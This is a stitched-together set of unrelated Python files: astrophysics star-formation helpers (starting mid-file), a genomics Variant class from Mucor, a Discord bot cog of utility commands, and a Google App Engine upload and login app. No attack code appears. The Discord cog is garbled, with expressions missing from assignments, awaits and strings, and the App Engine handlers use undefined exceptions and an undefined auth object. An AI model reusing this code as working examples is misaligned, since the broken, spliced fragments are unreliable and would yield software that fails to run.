SchmidtExp sf_hi = NormHi_cgs, GAMMA/GRAV, SchmidtExpHi return sfparams, sf_lo, sf_hi # ----------------------------------------------------------------- ## This private helper function obtains the SFR of gas from which star particles formed. # # Inputs: # - rho_form: gas density at formation of star particle # - mass: mass of star particle # - schmidtpars: parameters for implementing Schmidt law from schmidtParameters() # # Outputs: # - SFR = Star formation rate for gas particle in input mass units per year # def getSFR(rho_form, mass, schmidtpars): # unpack universal SF law parameters RhoNorm_cgs, RhoHi_cgs, P_totc, PBreak_cgs, GammaEff = schmidtpars[0] # Pressure at star formation P_form = P_totc * (rho_form / RhoNorm_cgs) ** GammaEff # unpack high and low pressure SF law parameters sf_lo, sf_hi = schmidtpars[1:] # calculate SFR if type(rho_form) == np.ndarray: hidx = rho_form > RhoHi_cgs SFR = np.zeros(rho_form.size) if np.any(hidx): SFR[hidx] = mass[hidx] * sf_hi[0] * (sf_hi[1] * P_form[hidx]) ** ((sf_hi[2] - 1) * 0.5) if np.any(-hidx): SFR[-hidx] = mass[-hidx] * sf_lo[0] * (sf_lo[1] * P_form[-hidx]) ** ((sf_lo[2] - 1) * 0.5) else: if rho_form > RhoHi_cgs: SFR = mass * sf_hi[0] * (sf_hi[1] * P_form) ** ((sf_hi[2] - 1) * 0.5) else: SFR = mass * sf_lo[0] * (sf_lo[1] * P_form) ** ((sf_lo[2] - 1) * 0.5) # return SFR converted to input mass units per year from per second return np.array(SFR) * 3.15569e7 # ----------------------------------------------------------------- ## This private helper function obtains the ambient pressure of gas from which star particles formed. # # Inputs: # - rho: gas density of star forming particle # - schmidtpars: parameters for implementing Schmidt law from schmidtParameters() # # Outputs: # - P_tot: Ambient pressure from polytropic effective EoS (Schaye & Dalla Vecchia (2004)) # def getPtot(rho, schmidtpars): RhoNorm_cgs, RhoHi_cgs, P_totc, PBreak_cgs, GammaEff = schmidtpars[0] P_form = P_totc * (rho / RhoNorm_cgs) ** GammaEff return P_form # ----------------------------------------------------------------- ## This private helper function samples star forming gas particles into a number of sub-particles. # # Inputs: # - sfr: star formation rate in solar masses per yr # - m_gas: particle mass in solar masses # # Outputs: # - nested arrays with a list of subparticles for each parent input particle: # - ms: sub-particle stellar masses in solar masses # - ts: lookback times of sub-particle formation # - idxs: index of the sub-particle's parent particle in input array # - mdiffs: mass of parent particles locked up in new stars; this can be subtracted from the parent gas # particles for mass conservation # def stochResamp(sfr, m_gas): # mass resampling parameters (see Kennicutt & Evans 2012 section 2.5) m_min = 700 # minimum mass of sub-particle in M_solar m_max = 1e6 # maximum mass of sub-particle in M_solar alpha = 1.8 # exponent of power-law mass function alpha1 = 1. - alpha # age resampling parameters thresh_age = 1e8 # period over which to resample in yr (100 Myr) # initialise lists for output ms = [[]] ts = [[]] idxs = [[]] mdiffs = [] # for each parent particle, determine the star-forming sub-particles for i in range(sfr.size): sfri = sfr[i] mi = m_gas[i] # determine the maximum number of sub-particles based on the minimum sub-particle mass N = int(max(1,np.ceil(mi/m_min))) # generate random sub-particle masses from a power-law distribution between min and max values X = np.random.random(N) m = (m_min**alpha1 + X*(m_max**alpha1-m_min**alpha1))**(1./alpha1) # limit and normalize the list of sub-particles to the total mass of the parent mlim = m[np.cumsum(m)<=mi] if len(mlim)<1: mlim = m[:1] m = mi/mlim.sum() * mlim N = len(m) # generate random decay lookback time for each sub-particle X = np.random.random(N) # X in range (0,1] t = thresh_age + mi/sfri * np.log(1-X) # determine mask for sub-particles that form stars by present day issf = t > 0. # add star-forming sub-particles to the output lists ms.append(m[issf]) ts.append(t[issf]) idxs.append([i]*np.count_nonzero(issf)) mdiffs.append(m[issf].sum()) # convert sub-particle lists into numpy arrays ms = np.hstack(ms) ts = np.hstack(ts) idxs = np.hstack(idxs).astype(int) mdiffs = np.array(mdiffs) return ms, ts, idxs, mdiffs # ----------------------------------------------------------------- ## This private helper function randomly shifts the positions of HII region sub-particles # within the smoothing sphere of their parent. # # Arguments: # - r: parent positions; updated by this function to the shifted positions # - h: the smoothing lengths of the parents # - h_mapp: the smoothing lengths of the sub-particles # def stochShiftPos(r, h, h_mapp): # the offset sampling smoothing length is determined so that in the limit of infinite particles, # the light distribution is the same as the parent particle kernel; # assuming Gaussian kernels this means h_sampling**2 + h_mapp**2 = h**2. h_sampling = np.sqrt(np.maximum(0,h*h - h_mapp*h_mapp)) # sample the offset from a scaled gaussian that resembles a cubic spline kernel # (see the documentation of the SPHDustDistribution class in SKIRT) r[:,0] += h_sampling * np.random.normal(scale=0.29, size=h_sampling.shape) r[:,1] += h_sampling * np.random.normal(scale=0.29, size=h_sampling.shape) r[:,2] += h_sampling * np.random.normal(scale=0.29, size=h_sampling.shape) # -----------------------------------------------------------------
# Copyright 2013-2015 James S Blachly, MD and The Ohio State University # # This file is part of Mucor. # # Mucor is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Mucor is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Mucor. If not, see <>. # from __future__ import print_function class Variant: '''Data about SNV and Indels''' def __init__(self,source,sample,pos,ref,alt,frac,dp, eff,fc): self.source = source # source of variant - typically a filename self.sample = sample # sample ID, as defined in the VCF self.pos = pos # HTSeq.GenomicPosition self.ref = ref self.alt = alt self.frac = frac self.dp = dp self.eff = eff self.fc = fc def __str__(self): out = "" for k,v in {'source':self.source, 'sample':self.sample, 'pos':self.pos, 'ref':self.ref, 'alt':self.alt, 'frac':self.frac, 'dp':self.dp, 'eff':self.eff, 'fc':self.fc}.items(): out += k + ":\t" + str(v) + "\n" return out.strip()
from io import BytesIO import discord from discord import File, Member from discord.ext import commands from discord.ext.commands import Cog from bot import BeattieBot from context import BContext class Default(Cog): """Default useful commands.""" @commands.command() async def avatar(self, ctx: BContext, *, user: Member = None) -> None: target: if user is None: target = else: target = user img = BytesIO() avatar = target.avatar_url_as( format="gif" if target.is_avatar_animated() else "png" ) await filename = str(avatar).rpartition("/")[2].partition("?")[0] await ctx.send(file=File(img, filename)) @avatar.error async def avatar_error(self, ctx: BContext, exc: Exception) -> None: if isinstance(exc, commands.BadArgument): await ctx.send("User not found.") else: await, exc) @commands.command() async def latency(self, ctx: BContext) -> None: """Get the latency to the websocket.""" await ctx.send(f"WS latency: **{*1000:.0f}ms**") @commands.command() async def ping(self, ctx: BContext) -> None: """Get how fast the bot reacts to a command message""" msg = await ctx.send("...") delta = msg.created_at - ctx.message.created_at await msg.edit(content=f":ping_pong: **{delta.total_seconds()*1000:.0f}ms**") msg = await edited_at = msg.edited_at assert edited_at is not None delta2 = edited_at - ctx.message.created_at await msg.edit( content=f"{msg.content}\n**{delta2.total_seconds()*1000:.0f}ms**" ) @commands.command() async def source(self, ctx: BContext) -> None: """Get the source for the bot.""" await ctx.send("") @commands.command() async def invite(self, ctx: BContext) -> None: """Get the invite for the bot.""" url = "<{}&scope=bot>" await ctx.send(url.format( def setup(bot: BeattieBot) -> None: bot.add_cog(Default())
import os import urllib import webapp2 import webapp2_extras.appengine.auth.models from webapp2_extras import security from webapp2_extras.appengine.auth.models import User from google.appengine.ext import blobstore from google.appengine.ext.webapp import blobstore_handlers class MainHandler(webapp2.RequestHandler): def get(self): upload_url = blobstore.create_upload_url('/upload') self.response.out.write('<html><body>') self.response.out.write('<form action="%s" method="POST" enctype="multipart/form-data">' % upload_url) self.response.out.write("""Upload File: <input type="file" name="file"><br> <input type="submit" name="submit" value="Submit"> </form></body></html>""") class UploadHandler(blobstore_handlers.BlobstoreUploadHandler): def post(self): upload_files = self.get_uploads('file') # 'file' is file upload field in the form blob_info = upload_files[0] self.redirect('/serve/%s' % blob_info.key()) class ServeHandler(blobstore_handlers.BlobstoreDownloadHandler): def get(self, resource): resource = str(urllib.unquote(resource)) blob_info = blobstore.BlobInfo.get(resource) self.send_blob(blob_info) class LoginHandler(webapp2.RequestHandler): def post(self): """ username: Get the username from POST dict password: Get the password from POST dict """ username = self.request.POST.get('username') password = self.request.POST.get('password') # Try to login user with password # Raises InvalidAuthIdError if user is not found # Raises InvalidPasswordError if provided password doesn't match with specified user try: self.auth.get_user_by_password(username, password) except (InvalidAuthIdError, InvalidPasswordError), e: # Returns error message to self.response.write in the BaseHandler.dispatcher # Currently no message is attached to the exceptions return e class SignupHandler(webapp2.RequestHandler): def post(self): """ username: Get the username from POST dict password: Get the password from POST dict """ username = self.request.POST.get('username') password = self.request.POST.get('password') # Try to login user with password # Raises InvalidAuthIdError if user is not found # Raises InvalidPasswordError if provided password doesn't match with specified user try: self.auth.create_user_by_password(username, password) except (InvalidAuthIdError, InvalidPasswordError), e: # Returns error message to self.response.write in the BaseHandler.dispatcher # Currently no message is attached to the exceptions return e app = webapp2.WSGIApplication([('/', MainHandler), ('/upload', UploadHandler), ('/serve/([^/]+)?', ServeHandler), ('/signup',SignupHandler), ('/login',LoginHandler)], debug=True)